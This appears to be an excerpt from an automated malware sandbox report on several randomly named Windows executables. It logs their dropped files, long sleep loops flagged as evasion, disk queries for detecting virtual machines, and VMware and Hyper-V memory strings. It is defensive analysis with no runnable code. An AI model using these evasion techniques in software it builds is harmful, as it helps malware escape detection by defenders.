Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\360TS_Setup.exe.P2P	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup294[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\o2i3jroi23joj23ikrjokij3oroi[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ED0F.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\niko[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FFE8.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7188	Thread sleep count: 3982 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7188	Thread sleep count: 5750 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599775s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599450s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599336s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598789s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598527s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597982s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596926s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596757s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596529s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596122s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595669s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595118s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595013s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7132	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594544s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594108s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -593885s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -593781s >= -30000s	Jump to behavior
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8652	Thread sleep count: 298 > 30
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8652	Thread sleep time: -59600s >= -30000s
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 7988	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8696	Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 1593 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 103 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8384	Thread sleep count: 423 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0040553A FindFirstFileA,		18_2_0040553A
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		18_2_004055DE

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E35824C0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7E35824C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599336	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596757	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596529	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595118	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595013	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594787	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593885	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\

Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: svchost.exe, 0000000D.00000002.2762397674.000001B899B32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2789612356.000001F4D86DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.2734633593.000001E0D128C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7Fup
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
